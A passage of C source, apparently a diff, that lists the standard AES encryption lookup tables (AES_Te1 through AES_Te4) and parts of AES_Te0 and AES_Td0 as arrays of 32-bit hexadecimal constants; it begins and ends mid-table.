0x5e2f2f71U, 0x13848497U, + 0xa65353f5U, 0xb9d1d168U, 0x00000000U, 0xc1eded2cU, + 0x40202060U, 0xe3fcfc1fU, 0x79b1b1c8U, 0xb65b5bedU, + 0xd46a6abeU, 0x8dcbcb46U, 0x67bebed9U, 0x7239394bU, + 0x944a4adeU, 0x984c4cd4U, 0xb05858e8U, 0x85cfcf4aU, + 0xbbd0d06bU, 0xc5efef2aU, 0x4faaaae5U, 0xedfbfb16U, + 0x864343c5U, 0x9a4d4dd7U, 0x66333355U, 0x11858594U, + 0x8a4545cfU, 0xe9f9f910U, 0x04020206U, 0xfe7f7f81U, + 0xa05050f0U, 0x783c3c44U, 0x259f9fbaU, 0x4ba8a8e3U, + 0xa25151f3U, 0x5da3a3feU, 0x804040c0U, 0x058f8f8aU, + 0x3f9292adU, 0x219d9dbcU, 0x70383848U, 0xf1f5f504U, + 0x63bcbcdfU, 0x77b6b6c1U, 0xafdada75U, 0x42212163U, + 0x20101030U, 0xe5ffff1aU, 0xfdf3f30eU, 0xbfd2d26dU, + 0x81cdcd4cU, 0x180c0c14U, 0x26131335U, 0xc3ecec2fU, + 0xbe5f5fe1U, 0x359797a2U, 0x884444ccU, 0x2e171739U, + 0x93c4c457U, 0x55a7a7f2U, 0xfc7e7e82U, 0x7a3d3d47U, + 0xc86464acU, 0xba5d5de7U, 0x3219192bU, 0xe6737395U, + 0xc06060a0U, 0x19818198U, 0x9e4f4fd1U, 0xa3dcdc7fU, + 0x44222266U, 0x542a2a7eU, 0x3b9090abU, 0x0b888883U, + 0x8c4646caU, 0xc7eeee29U, 0x6bb8b8d3U, 0x2814143cU, + 0xa7dede79U, 0xbc5e5ee2U, 0x160b0b1dU, 0xaddbdb76U, + 0xdbe0e03bU, 0x64323256U, 0x743a3a4eU, 0x140a0a1eU, + 0x924949dbU, 0x0c06060aU, 0x4824246cU, 0xb85c5ce4U, + 0x9fc2c25dU, 0xbdd3d36eU, 0x43acacefU, 0xc46262a6U, + 0x399191a8U, 0x319595a4U, 0xd3e4e437U, 0xf279798bU, + 0xd5e7e732U, 0x8bc8c843U, 0x6e373759U, 0xda6d6db7U, + 0x018d8d8cU, 0xb1d5d564U, 0x9c4e4ed2U, 0x49a9a9e0U, + 0xd86c6cb4U, 0xac5656faU, 0xf3f4f407U, 0xcfeaea25U, + 0xca6565afU, 0xf47a7a8eU, 0x47aeaee9U, 0x10080818U, + 0x6fbabad5U, 0xf0787888U, 0x4a25256fU, 0x5c2e2e72U, + 0x381c1c24U, 0x57a6a6f1U, 0x73b4b4c7U, 0x97c6c651U, + 0xcbe8e823U, 0xa1dddd7cU, 0xe874749cU, 0x3e1f1f21U, + 0x964b4bddU, 0x61bdbddcU, 0x0d8b8b86U, 0x0f8a8a85U, + 0xe0707090U, 0x7c3e3e42U, 0x71b5b5c4U, 0xcc6666aaU, + 0x904848d8U, 0x06030305U, 0xf7f6f601U, 0x1c0e0e12U, + 0xc26161a3U, 0x6a35355fU, 0xae5757f9U, 0x69b9b9d0U, + 0x17868691U, 0x99c1c158U, 0x3a1d1d27U, 0x279e9eb9U, + 0xd9e1e138U, 0xebf8f813U, 0x2b9898b3U, 0x22111133U, + 0xd26969bbU, 0xa9d9d970U, 0x078e8e89U, 0x339494a7U, + 0x2d9b9bb6U, 0x3c1e1e22U, 0x15878792U, 0xc9e9e920U, + 0x87cece49U, 0xaa5555ffU, 0x50282878U, 0xa5dfdf7aU, + 0x038c8c8fU, 0x59a1a1f8U, 0x09898980U, 0x1a0d0d17U, + 0x65bfbfdaU, 0xd7e6e631U, 0x844242c6U, 0xd06868b8U, + 0x824141c3U, 0x299999b0U, 0x5a2d2d77U, 0x1e0f0f11U, + 0x7bb0b0cbU, 0xa85454fcU, 0x6dbbbbd6U, 0x2c16163aU, +}; +const uint32_t AES_Te1[256] = { + 0xa5c66363U, 0x84f87c7cU, 0x99ee7777U, 0x8df67b7bU, + 0x0dfff2f2U, 0xbdd66b6bU, 0xb1de6f6fU, 0x5491c5c5U, + 0x50603030U, 0x03020101U, 0xa9ce6767U, 0x7d562b2bU, + 0x19e7fefeU, 0x62b5d7d7U, 0xe64dababU, 0x9aec7676U, + 0x458fcacaU, 0x9d1f8282U, 0x4089c9c9U, 0x87fa7d7dU, + 0x15effafaU, 0xebb25959U, 0xc98e4747U, 0x0bfbf0f0U, + 0xec41adadU, 0x67b3d4d4U, 0xfd5fa2a2U, 0xea45afafU, + 0xbf239c9cU, 0xf753a4a4U, 0x96e47272U, 0x5b9bc0c0U, + 0xc275b7b7U, 0x1ce1fdfdU, 0xae3d9393U, 0x6a4c2626U, + 0x5a6c3636U, 0x417e3f3fU, 0x02f5f7f7U, 0x4f83ccccU, + 0x5c683434U, 0xf451a5a5U, 0x34d1e5e5U, 0x08f9f1f1U, + 0x93e27171U, 0x73abd8d8U, 0x53623131U, 0x3f2a1515U, + 0x0c080404U, 0x5295c7c7U, 0x65462323U, 0x5e9dc3c3U, + 0x28301818U, 0xa1379696U, 0x0f0a0505U, 0xb52f9a9aU, + 0x090e0707U, 0x36241212U, 0x9b1b8080U, 0x3ddfe2e2U, + 0x26cdebebU, 0x694e2727U, 0xcd7fb2b2U, 0x9fea7575U, + 0x1b120909U, 0x9e1d8383U, 0x74582c2cU, 0x2e341a1aU, + 0x2d361b1bU, 0xb2dc6e6eU, 0xeeb45a5aU, 0xfb5ba0a0U, + 0xf6a45252U, 0x4d763b3bU, 0x61b7d6d6U, 0xce7db3b3U, + 0x7b522929U, 0x3edde3e3U, 0x715e2f2fU, 0x97138484U, + 0xf5a65353U, 0x68b9d1d1U, 0x00000000U, 0x2cc1ededU, + 0x60402020U, 0x1fe3fcfcU, 0xc879b1b1U, 0xedb65b5bU, + 0xbed46a6aU, 0x468dcbcbU, 0xd967bebeU, 0x4b723939U, + 0xde944a4aU, 0xd4984c4cU, 0xe8b05858U, 0x4a85cfcfU, + 0x6bbbd0d0U, 0x2ac5efefU, 0xe54faaaaU, 0x16edfbfbU, + 0xc5864343U, 0xd79a4d4dU, 0x55663333U, 0x94118585U, + 0xcf8a4545U, 0x10e9f9f9U, 0x06040202U, 0x81fe7f7fU, + 0xf0a05050U, 0x44783c3cU, 0xba259f9fU, 0xe34ba8a8U, + 0xf3a25151U, 0xfe5da3a3U, 0xc0804040U, 0x8a058f8fU, + 0xad3f9292U, 0xbc219d9dU, 0x48703838U, 0x04f1f5f5U, + 0xdf63bcbcU, 0xc177b6b6U, 0x75afdadaU, 0x63422121U, + 0x30201010U, 0x1ae5ffffU, 0x0efdf3f3U, 0x6dbfd2d2U, + 0x4c81cdcdU, 0x14180c0cU, 0x35261313U, 0x2fc3ececU, + 0xe1be5f5fU, 0xa2359797U, 0xcc884444U, 0x392e1717U, + 0x5793c4c4U, 0xf255a7a7U, 0x82fc7e7eU, 0x477a3d3dU, + 0xacc86464U, 0xe7ba5d5dU, 0x2b321919U, 0x95e67373U, + 0xa0c06060U, 0x98198181U, 0xd19e4f4fU, 0x7fa3dcdcU, + 0x66442222U, 0x7e542a2aU, 0xab3b9090U, 0x830b8888U, + 0xca8c4646U, 0x29c7eeeeU, 0xd36bb8b8U, 0x3c281414U, + 0x79a7dedeU, 0xe2bc5e5eU, 0x1d160b0bU, 0x76addbdbU, + 0x3bdbe0e0U, 0x56643232U, 0x4e743a3aU, 0x1e140a0aU, + 0xdb924949U, 0x0a0c0606U, 0x6c482424U, 0xe4b85c5cU, + 0x5d9fc2c2U, 0x6ebdd3d3U, 0xef43acacU, 0xa6c46262U, + 0xa8399191U, 0xa4319595U, 0x37d3e4e4U, 0x8bf27979U, + 0x32d5e7e7U, 0x438bc8c8U, 0x596e3737U, 0xb7da6d6dU, + 0x8c018d8dU, 0x64b1d5d5U, 0xd29c4e4eU, 0xe049a9a9U, + 0xb4d86c6cU, 0xfaac5656U, 0x07f3f4f4U, 0x25cfeaeaU, + 0xafca6565U, 0x8ef47a7aU, 0xe947aeaeU, 0x18100808U, + 0xd56fbabaU, 0x88f07878U, 0x6f4a2525U, 0x725c2e2eU, + 0x24381c1cU, 0xf157a6a6U, 0xc773b4b4U, 0x5197c6c6U, + 0x23cbe8e8U, 0x7ca1ddddU, 0x9ce87474U, 0x213e1f1fU, + 0xdd964b4bU, 0xdc61bdbdU, 0x860d8b8bU, 0x850f8a8aU, + 0x90e07070U, 0x427c3e3eU, 0xc471b5b5U, 0xaacc6666U, + 0xd8904848U, 0x05060303U, 0x01f7f6f6U, 0x121c0e0eU, + 0xa3c26161U, 0x5f6a3535U, 0xf9ae5757U, 0xd069b9b9U, + 0x91178686U, 0x5899c1c1U, 0x273a1d1dU, 0xb9279e9eU, + 0x38d9e1e1U, 0x13ebf8f8U, 0xb32b9898U, 0x33221111U, + 0xbbd26969U, 0x70a9d9d9U, 0x89078e8eU, 0xa7339494U, + 0xb62d9b9bU, 0x223c1e1eU, 0x92158787U, 0x20c9e9e9U, + 0x4987ceceU, 0xffaa5555U, 0x78502828U, 0x7aa5dfdfU, + 0x8f038c8cU, 0xf859a1a1U, 0x80098989U, 0x171a0d0dU, + 0xda65bfbfU, 0x31d7e6e6U, 0xc6844242U, 0xb8d06868U, + 0xc3824141U, 0xb0299999U, 0x775a2d2dU, 0x111e0f0fU, + 0xcb7bb0b0U, 0xfca85454U, 0xd66dbbbbU, 0x3a2c1616U, +}; +const uint32_t AES_Te2[256] = { + 0x63a5c663U, 0x7c84f87cU, 0x7799ee77U, 0x7b8df67bU, + 0xf20dfff2U, 0x6bbdd66bU, 0x6fb1de6fU, 0xc55491c5U, + 0x30506030U, 0x01030201U, 0x67a9ce67U, 0x2b7d562bU, + 0xfe19e7feU, 0xd762b5d7U, 0xabe64dabU, 0x769aec76U, + 0xca458fcaU, 0x829d1f82U, 0xc94089c9U, 0x7d87fa7dU, + 0xfa15effaU, 0x59ebb259U, 0x47c98e47U, 0xf00bfbf0U, + 0xadec41adU, 0xd467b3d4U, 0xa2fd5fa2U, 0xafea45afU, + 0x9cbf239cU, 0xa4f753a4U, 0x7296e472U, 0xc05b9bc0U, + 0xb7c275b7U, 0xfd1ce1fdU, 0x93ae3d93U, 0x266a4c26U, + 0x365a6c36U, 0x3f417e3fU, 0xf702f5f7U, 0xcc4f83ccU, + 0x345c6834U, 0xa5f451a5U, 0xe534d1e5U, 0xf108f9f1U, + 0x7193e271U, 0xd873abd8U, 0x31536231U, 0x153f2a15U, + 0x040c0804U, 0xc75295c7U, 0x23654623U, 0xc35e9dc3U, + 0x18283018U, 0x96a13796U, 0x050f0a05U, 0x9ab52f9aU, + 0x07090e07U, 0x12362412U, 0x809b1b80U, 0xe23ddfe2U, + 0xeb26cdebU, 0x27694e27U, 0xb2cd7fb2U, 0x759fea75U, + 0x091b1209U, 0x839e1d83U, 0x2c74582cU, 0x1a2e341aU, + 0x1b2d361bU, 0x6eb2dc6eU, 0x5aeeb45aU, 0xa0fb5ba0U, + 0x52f6a452U, 0x3b4d763bU, 0xd661b7d6U, 0xb3ce7db3U, + 0x297b5229U, 0xe33edde3U, 0x2f715e2fU, 0x84971384U, + 0x53f5a653U, 0xd168b9d1U, 0x00000000U, 0xed2cc1edU, + 0x20604020U, 0xfc1fe3fcU, 0xb1c879b1U, 0x5bedb65bU, + 0x6abed46aU, 0xcb468dcbU, 0xbed967beU, 0x394b7239U, + 0x4ade944aU, 0x4cd4984cU, 0x58e8b058U, 0xcf4a85cfU, + 0xd06bbbd0U, 0xef2ac5efU, 0xaae54faaU, 0xfb16edfbU, + 0x43c58643U, 0x4dd79a4dU, 0x33556633U, 0x85941185U, + 0x45cf8a45U, 0xf910e9f9U, 0x02060402U, 0x7f81fe7fU, + 0x50f0a050U, 0x3c44783cU, 0x9fba259fU, 0xa8e34ba8U, + 0x51f3a251U, 0xa3fe5da3U, 0x40c08040U, 0x8f8a058fU, + 0x92ad3f92U, 0x9dbc219dU, 0x38487038U, 0xf504f1f5U, + 0xbcdf63bcU, 0xb6c177b6U, 0xda75afdaU, 0x21634221U, + 0x10302010U, 0xff1ae5ffU, 0xf30efdf3U, 0xd26dbfd2U, + 0xcd4c81cdU, 0x0c14180cU, 0x13352613U, 0xec2fc3ecU, + 0x5fe1be5fU, 0x97a23597U, 0x44cc8844U, 0x17392e17U, + 0xc45793c4U, 0xa7f255a7U, 0x7e82fc7eU, 0x3d477a3dU, + 0x64acc864U, 0x5de7ba5dU, 0x192b3219U, 0x7395e673U, + 0x60a0c060U, 0x81981981U, 0x4fd19e4fU, 0xdc7fa3dcU, + 0x22664422U, 0x2a7e542aU, 0x90ab3b90U, 0x88830b88U, + 0x46ca8c46U, 0xee29c7eeU, 0xb8d36bb8U, 0x143c2814U, + 0xde79a7deU, 0x5ee2bc5eU, 0x0b1d160bU, 0xdb76addbU, + 0xe03bdbe0U, 0x32566432U, 0x3a4e743aU, 0x0a1e140aU, + 0x49db9249U, 0x060a0c06U, 0x246c4824U, 0x5ce4b85cU, + 0xc25d9fc2U, 0xd36ebdd3U, 0xacef43acU, 0x62a6c462U, + 0x91a83991U, 0x95a43195U, 0xe437d3e4U, 0x798bf279U, + 0xe732d5e7U, 0xc8438bc8U, 0x37596e37U, 0x6db7da6dU, + 0x8d8c018dU, 0xd564b1d5U, 0x4ed29c4eU, 0xa9e049a9U, + 0x6cb4d86cU, 0x56faac56U, 0xf407f3f4U, 0xea25cfeaU, + 0x65afca65U, 0x7a8ef47aU, 0xaee947aeU, 0x08181008U, + 0xbad56fbaU, 0x7888f078U, 0x256f4a25U, 0x2e725c2eU, + 0x1c24381cU, 0xa6f157a6U, 0xb4c773b4U, 0xc65197c6U, + 0xe823cbe8U, 0xdd7ca1ddU, 0x749ce874U, 0x1f213e1fU, + 0x4bdd964bU, 0xbddc61bdU, 0x8b860d8bU, 0x8a850f8aU, + 0x7090e070U, 0x3e427c3eU, 0xb5c471b5U, 0x66aacc66U, + 0x48d89048U, 0x03050603U, 0xf601f7f6U, 0x0e121c0eU, + 0x61a3c261U, 0x355f6a35U, 0x57f9ae57U, 0xb9d069b9U, + 0x86911786U, 0xc15899c1U, 0x1d273a1dU, 0x9eb9279eU, + 0xe138d9e1U, 0xf813ebf8U, 0x98b32b98U, 0x11332211U, + 0x69bbd269U, 0xd970a9d9U, 0x8e89078eU, 0x94a73394U, + 0x9bb62d9bU, 0x1e223c1eU, 0x87921587U, 0xe920c9e9U, + 0xce4987ceU, 0x55ffaa55U, 0x28785028U, 0xdf7aa5dfU, + 0x8c8f038cU, 0xa1f859a1U, 0x89800989U, 0x0d171a0dU, + 0xbfda65bfU, 0xe631d7e6U, 0x42c68442U, 0x68b8d068U, + 0x41c38241U, 0x99b02999U, 0x2d775a2dU, 0x0f111e0fU, + 0xb0cb7bb0U, 0x54fca854U, 0xbbd66dbbU, 0x163a2c16U, +}; +const uint32_t AES_Te3[256] = { + + 0x6363a5c6U, 0x7c7c84f8U, 0x777799eeU, 0x7b7b8df6U, + 0xf2f20dffU, 0x6b6bbdd6U, 0x6f6fb1deU, 0xc5c55491U, + 0x30305060U, 0x01010302U, 0x6767a9ceU, 0x2b2b7d56U, + 0xfefe19e7U, 0xd7d762b5U, 0xababe64dU, 0x76769aecU, + 0xcaca458fU, 0x82829d1fU, 0xc9c94089U, 0x7d7d87faU, + 0xfafa15efU, 0x5959ebb2U, 0x4747c98eU, 0xf0f00bfbU, + 0xadadec41U, 0xd4d467b3U, 0xa2a2fd5fU, 0xafafea45U, + 0x9c9cbf23U, 0xa4a4f753U, 0x727296e4U, 0xc0c05b9bU, + 0xb7b7c275U, 0xfdfd1ce1U, 0x9393ae3dU, 0x26266a4cU, + 0x36365a6cU, 0x3f3f417eU, 0xf7f702f5U, 0xcccc4f83U, + 0x34345c68U, 0xa5a5f451U, 0xe5e534d1U, 0xf1f108f9U, + 0x717193e2U, 0xd8d873abU, 0x31315362U, 0x15153f2aU, + 0x04040c08U, 0xc7c75295U, 0x23236546U, 0xc3c35e9dU, + 0x18182830U, 0x9696a137U, 0x05050f0aU, 0x9a9ab52fU, + 0x0707090eU, 0x12123624U, 0x80809b1bU, 0xe2e23ddfU, + 0xebeb26cdU, 0x2727694eU, 0xb2b2cd7fU, 0x75759feaU, + 0x09091b12U, 0x83839e1dU, 0x2c2c7458U, 0x1a1a2e34U, + 0x1b1b2d36U, 0x6e6eb2dcU, 0x5a5aeeb4U, 0xa0a0fb5bU, + 0x5252f6a4U, 0x3b3b4d76U, 0xd6d661b7U, 0xb3b3ce7dU, + 0x29297b52U, 0xe3e33eddU, 0x2f2f715eU, 0x84849713U, + 0x5353f5a6U, 0xd1d168b9U, 0x00000000U, 0xeded2cc1U, + 0x20206040U, 0xfcfc1fe3U, 0xb1b1c879U, 0x5b5bedb6U, + 0x6a6abed4U, 0xcbcb468dU, 0xbebed967U, 0x39394b72U, + 0x4a4ade94U, 0x4c4cd498U, 0x5858e8b0U, 0xcfcf4a85U, + 0xd0d06bbbU, 0xefef2ac5U, 0xaaaae54fU, 0xfbfb16edU, + 0x4343c586U, 0x4d4dd79aU, 0x33335566U, 0x85859411U, + 0x4545cf8aU, 0xf9f910e9U, 0x02020604U, 0x7f7f81feU, + 0x5050f0a0U, 0x3c3c4478U, 0x9f9fba25U, 0xa8a8e34bU, + 0x5151f3a2U, 0xa3a3fe5dU, 0x4040c080U, 0x8f8f8a05U, + 0x9292ad3fU, 0x9d9dbc21U, 0x38384870U, 0xf5f504f1U, + 0xbcbcdf63U, 0xb6b6c177U, 0xdada75afU, 0x21216342U, + 0x10103020U, 0xffff1ae5U, 0xf3f30efdU, 0xd2d26dbfU, + 0xcdcd4c81U, 0x0c0c1418U, 0x13133526U, 0xecec2fc3U, + 0x5f5fe1beU, 0x9797a235U, 0x4444cc88U, 0x1717392eU, + 0xc4c45793U, 0xa7a7f255U, 0x7e7e82fcU, 0x3d3d477aU, + 0x6464acc8U, 0x5d5de7baU, 0x19192b32U, 0x737395e6U, + 0x6060a0c0U, 0x81819819U, 0x4f4fd19eU, 0xdcdc7fa3U, + 0x22226644U, 0x2a2a7e54U, 0x9090ab3bU, 0x8888830bU, + 0x4646ca8cU, 0xeeee29c7U, 0xb8b8d36bU, 0x14143c28U, + 0xdede79a7U, 0x5e5ee2bcU, 0x0b0b1d16U, 0xdbdb76adU, + 0xe0e03bdbU, 0x32325664U, 0x3a3a4e74U, 0x0a0a1e14U, + 0x4949db92U, 0x06060a0cU, 0x24246c48U, 0x5c5ce4b8U, + 0xc2c25d9fU, 0xd3d36ebdU, 0xacacef43U, 0x6262a6c4U, + 0x9191a839U, 0x9595a431U, 0xe4e437d3U, 0x79798bf2U, + 0xe7e732d5U, 0xc8c8438bU, 0x3737596eU, 0x6d6db7daU, + 0x8d8d8c01U, 0xd5d564b1U, 0x4e4ed29cU, 0xa9a9e049U, + 0x6c6cb4d8U, 0x5656faacU, 0xf4f407f3U, 0xeaea25cfU, + 0x6565afcaU, 0x7a7a8ef4U, 0xaeaee947U, 0x08081810U, + 0xbabad56fU, 0x787888f0U, 0x25256f4aU, 0x2e2e725cU, + 0x1c1c2438U, 0xa6a6f157U, 0xb4b4c773U, 0xc6c65197U, + 0xe8e823cbU, 0xdddd7ca1U, 0x74749ce8U, 0x1f1f213eU, + 0x4b4bdd96U, 0xbdbddc61U, 0x8b8b860dU, 0x8a8a850fU, + 0x707090e0U, 0x3e3e427cU, 0xb5b5c471U, 0x6666aaccU, + 0x4848d890U, 0x03030506U, 0xf6f601f7U, 0x0e0e121cU, + 0x6161a3c2U, 0x35355f6aU, 0x5757f9aeU, 0xb9b9d069U, + 0x86869117U, 0xc1c15899U, 0x1d1d273aU, 0x9e9eb927U, + 0xe1e138d9U, 0xf8f813ebU, 0x9898b32bU, 0x11113322U, + 0x6969bbd2U, 0xd9d970a9U, 0x8e8e8907U, 0x9494a733U, + 0x9b9bb62dU, 0x1e1e223cU, 0x87879215U, 0xe9e920c9U, + 0xcece4987U, 0x5555ffaaU, 0x28287850U, 0xdfdf7aa5U, + 0x8c8c8f03U, 0xa1a1f859U, 0x89898009U, 0x0d0d171aU, + 0xbfbfda65U, 0xe6e631d7U, 0x4242c684U, 0x6868b8d0U, + 0x4141c382U, 0x9999b029U, 0x2d2d775aU, 0x0f0f111eU, + 0xb0b0cb7bU, 0x5454fca8U, 0xbbbbd66dU, 0x16163a2cU, +}; +const uint32_t AES_Te4[256] = { + 0x63636363U, 0x7c7c7c7cU, 0x77777777U, 0x7b7b7b7bU, + 0xf2f2f2f2U, 0x6b6b6b6bU, 0x6f6f6f6fU, 0xc5c5c5c5U, + 0x30303030U, 0x01010101U, 0x67676767U, 0x2b2b2b2bU, + 0xfefefefeU, 0xd7d7d7d7U, 0xababababU, 0x76767676U, + 0xcacacacaU, 0x82828282U, 0xc9c9c9c9U, 0x7d7d7d7dU, + 0xfafafafaU, 0x59595959U, 0x47474747U, 0xf0f0f0f0U, + 0xadadadadU, 0xd4d4d4d4U, 0xa2a2a2a2U, 0xafafafafU, + 0x9c9c9c9cU, 0xa4a4a4a4U, 0x72727272U, 0xc0c0c0c0U, + 0xb7b7b7b7U, 0xfdfdfdfdU, 0x93939393U, 0x26262626U, + 0x36363636U, 0x3f3f3f3fU, 0xf7f7f7f7U, 0xccccccccU, + 0x34343434U, 0xa5a5a5a5U, 0xe5e5e5e5U, 0xf1f1f1f1U, + 0x71717171U, 0xd8d8d8d8U, 0x31313131U, 0x15151515U, + 0x04040404U, 0xc7c7c7c7U, 0x23232323U, 0xc3c3c3c3U, + 0x18181818U, 0x96969696U, 0x05050505U, 0x9a9a9a9aU, + 0x07070707U, 0x12121212U, 0x80808080U, 0xe2e2e2e2U, + 0xebebebebU, 0x27272727U, 0xb2b2b2b2U, 0x75757575U, + 0x09090909U, 0x83838383U, 0x2c2c2c2cU, 0x1a1a1a1aU, + 0x1b1b1b1bU, 0x6e6e6e6eU, 0x5a5a5a5aU, 0xa0a0a0a0U, + 0x52525252U, 0x3b3b3b3bU, 0xd6d6d6d6U, 0xb3b3b3b3U, + 0x29292929U, 0xe3e3e3e3U, 0x2f2f2f2fU, 0x84848484U, + 0x53535353U, 0xd1d1d1d1U, 0x00000000U, 0xededededU, + 0x20202020U, 0xfcfcfcfcU, 0xb1b1b1b1U, 0x5b5b5b5bU, + 0x6a6a6a6aU, 0xcbcbcbcbU, 0xbebebebeU, 0x39393939U, + 0x4a4a4a4aU, 0x4c4c4c4cU, 0x58585858U, 0xcfcfcfcfU, + 0xd0d0d0d0U, 0xefefefefU, 0xaaaaaaaaU, 0xfbfbfbfbU, + 0x43434343U, 0x4d4d4d4dU, 0x33333333U, 0x85858585U, + 0x45454545U, 0xf9f9f9f9U, 0x02020202U, 0x7f7f7f7fU, + 0x50505050U, 0x3c3c3c3cU, 0x9f9f9f9fU, 0xa8a8a8a8U, + 0x51515151U, 0xa3a3a3a3U, 0x40404040U, 0x8f8f8f8fU, + 0x92929292U, 0x9d9d9d9dU, 0x38383838U, 0xf5f5f5f5U, + 0xbcbcbcbcU, 0xb6b6b6b6U, 0xdadadadaU, 0x21212121U, + 0x10101010U, 0xffffffffU, 0xf3f3f3f3U, 0xd2d2d2d2U, + 0xcdcdcdcdU, 0x0c0c0c0cU, 0x13131313U, 0xececececU, + 0x5f5f5f5fU, 0x97979797U, 0x44444444U, 0x17171717U, + 0xc4c4c4c4U, 0xa7a7a7a7U, 0x7e7e7e7eU, 0x3d3d3d3dU, + 0x64646464U, 0x5d5d5d5dU, 0x19191919U, 0x73737373U, + 0x60606060U, 0x81818181U, 0x4f4f4f4fU, 0xdcdcdcdcU, + 0x22222222U, 0x2a2a2a2aU, 0x90909090U, 0x88888888U, + 0x46464646U, 0xeeeeeeeeU, 0xb8b8b8b8U, 0x14141414U, + 0xdedededeU, 0x5e5e5e5eU, 0x0b0b0b0bU, 0xdbdbdbdbU, + 0xe0e0e0e0U, 0x32323232U, 0x3a3a3a3aU, 0x0a0a0a0aU, + 0x49494949U, 0x06060606U, 0x24242424U, 0x5c5c5c5cU, + 0xc2c2c2c2U, 0xd3d3d3d3U, 0xacacacacU, 0x62626262U, + 0x91919191U, 0x95959595U, 0xe4e4e4e4U, 0x79797979U, + 0xe7e7e7e7U, 0xc8c8c8c8U, 0x37373737U, 0x6d6d6d6dU, + 0x8d8d8d8dU, 0xd5d5d5d5U, 0x4e4e4e4eU, 0xa9a9a9a9U, + 0x6c6c6c6cU, 0x56565656U, 0xf4f4f4f4U, 0xeaeaeaeaU, + 0x65656565U, 0x7a7a7a7aU, 0xaeaeaeaeU, 0x08080808U, + 0xbabababaU, 0x78787878U, 0x25252525U, 0x2e2e2e2eU, + 0x1c1c1c1cU, 0xa6a6a6a6U, 0xb4b4b4b4U, 0xc6c6c6c6U, + 0xe8e8e8e8U, 0xddddddddU, 0x74747474U, 0x1f1f1f1fU, + 0x4b4b4b4bU, 0xbdbdbdbdU, 0x8b8b8b8bU, 0x8a8a8a8aU, + 0x70707070U, 0x3e3e3e3eU, 0xb5b5b5b5U, 0x66666666U, + 0x48484848U, 0x03030303U, 0xf6f6f6f6U, 0x0e0e0e0eU, + 0x61616161U, 0x35353535U, 0x57575757U, 0xb9b9b9b9U, + 0x86868686U, 0xc1c1c1c1U, 0x1d1d1d1dU, 0x9e9e9e9eU, + 0xe1e1e1e1U, 0xf8f8f8f8U, 0x98989898U, 0x11111111U, + 0x69696969U, 0xd9d9d9d9U, 0x8e8e8e8eU, 0x94949494U, + 0x9b9b9b9bU, 0x1e1e1e1eU, 0x87878787U, 0xe9e9e9e9U, + 0xcecececeU, 0x55555555U, 0x28282828U, 0xdfdfdfdfU, + 0x8c8c8c8cU, 0xa1a1a1a1U, 0x89898989U, 0x0d0d0d0dU, + 0xbfbfbfbfU, 0xe6e6e6e6U, 0x42424242U, 0x68686868U, + 0x41414141U, 0x99999999U, 0x2d2d2d2dU, 0x0f0f0f0fU, + 0xb0b0b0b0U, 0x54545454U, 0xbbbbbbbbU, 0x16161616U, +}; +const uint32_t AES_Td0[256] = { + 0x51f4a750U, 0x7e416553U, 0x1a17a4c3U, 0x3a275e96U, + 0x3bab6bcbU, 0x1f9d45f1U, 0xacfa58abU, 0x4be30393U, + 0x2030fa55U, 0xad766df6U, 0x88cc7691U, 0xf5024c25U, + 0x4fe5d7fcU, 0xc52acbd7U, 0x26354480U, 0xb562a38fU, + 0xdeb15a49U, 0x25ba1b67U, 0x45ea0e98U, 0x5dfec0e1U, + 0xc32f7502U, 0x814cf012U, 0x8d4697a3U, 0x6bd3f9c6U, + 0x038f5fe7U, 0x15929c95U, 0xbf6d7aebU, 0x955259daU, + 0xd4be832dU, 0x587421d3U, 0x49e06929U, 0x8ec9c844U, + 0x75c2896aU, 0xf48e7978U, 0x99583e6bU, 0x27b971ddU, + 0xbee14fb6U, 0xf088ad17U, 0xc920ac66U, 0x7dce3ab4U, + 0x63df4a18U, 0xe51a3182U, 0x97513360U, 0x62537f45U, + 0xb16477e0U, 0xbb6bae84U, 0xfe81a01cU, 0xf9082b94U, + 0x70486858U, 0x8f45fd19U, 0x94de6c87U, 0x527bf8b7U, + 0xab73d323U, 0x724b02e2U, 0xe31f8f57U, 0x6655ab2aU, + 0xb2eb2807U, 0x2fb5c203U, 0x86c57b9aU, 0xd33708a5U, + 0x302887f2U, 0x23bfa5b2U, 0x02036abaU, 0xed16825cU, + 0x8acf1c2bU, 0xa779b492U, 0xf307f2f0U, 0x4e69e2a1U, + 0x65daf4cdU, 0x0605bed5U, 0xd134621fU, 0xc4a6fe8aU, + 0x342e539dU, 0xa2f355a0U, 0x058ae132U, 0xa4f6eb75U, + 0x0b83ec39U, 0x4060efaaU, 0x5e719f06U, 0xbd6e1051U, + 0x3e218af9U, 0x96dd063dU, 0xdd3e05aeU, 0x4de6bd46U, + 0x91548db5U, 0x71c45d05U, 0x0406d46fU, 0x605015ffU, + 0x1998fb24U, 0xd6bde997U, 0x894043ccU, 0x67d99e77U, + 0xb0e842bdU, 0x07898b88U, 0xe7195b38U, 0x79c8eedbU, + 0xa17c0a47U, 0x7c420fe9U, 0xf8841ec9U, 0x00000000U, + 0x09808683U, 0x322bed48U, 0x1e1170acU, 0x6c5a724eU, + 0xfd0efffbU, 0x0f853856U, 0x3daed51eU, 0x362d3927U, + 0x0a0fd964U, 0x685ca621U, 0x9b5b54d1U, 0x24362e3aU, + 0x0c0a67b1U, 0x9357e70fU, 0xb4ee96d2U, 0x1b9b919eU, + 0x80c0c54fU, 0x61dc20a2U, 0x5a774b69U, 0x1c121a16U, + 0xe293ba0aU, 0xc0a02ae5U, 0x3c22e043U, 0x121b171dU, + 0x0e090d0bU, 0xf28bc7adU, 0x2db6a8b9U, 0x141ea9c8U, + 0x57f11985U, 0xaf75074cU, 0xee99ddbbU, 0xa37f60fdU, + 0xf701269fU, 0x5c72f5bcU, 0x44663bc5U, 0x5bfb7e34U, + 0x8b432976U, 0xcb23c6dcU, 0xb6edfc68U, 0xb8e4f163U, + 0xd731dccaU, 0x42638510U, 0x13972240U, 0x84c61120U, + 0x854a247dU, 0xd2bb3df8U, 0xaef93211U, 0xc729a16dU, + 0x1d9e2f4bU, 0xdcb230f3U, 0x0d8652ecU, 0x77c1e3d0U, + 0x2bb3166cU, 0xa970b999U, 0x119448faU, 0x47e96422U, + 0xa8fc8cc4U, 0xa0f03f1aU, 0x567d2cd8U, 0x223390efU, + 0x87494ec7U, 0xd938d1c1U, 0x8ccaa2feU, 0x98d40b36U, + 0xa6f581cfU, 0xa57ade28U, 0xdab78e26U, 0x3fadbfa4U, + 0x2c3a9de4U, 0x5078920dU, 0x6a5fcc9bU, 0x547e4662U, + 0xf68d13c2U, 0x90d8b8e8U, 0x2e39f75eU, 0x82c3aff5U, + 0x9f5d80beU, 0x69d0937cU, 